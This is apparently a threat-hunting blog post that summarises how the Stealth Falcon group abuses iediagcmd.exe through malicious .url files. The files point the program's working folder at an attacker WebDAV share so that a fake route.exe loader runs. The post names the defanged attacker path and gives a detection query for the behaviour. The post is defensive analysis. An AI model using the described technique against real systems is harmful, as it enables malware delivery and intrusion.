163. A Curious Case of Iediagcmd.exe Abuse

Hello everyone!

Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe.

The adversary uses malicious .url files. The URL parameter points to iediagcmd.exe. Normally this executable spawns additional processes to collect diagnostic data, including route.exe. The working folder is changed by the .url to the attacker-controlled WebDAV server, so iediagcmd.exe runs the route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe (Horus Loader) instead of a legitimate one in system32 folder.

Of course, we can use it for detection, and search for iediagcmd.exe executing files from WebDAV servers, for example:

event_type: "processcreatewin"

AND

proc_p_file_path: "iediagcmd.exe"

AND

proc_file_path: "DavWWWRoot"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge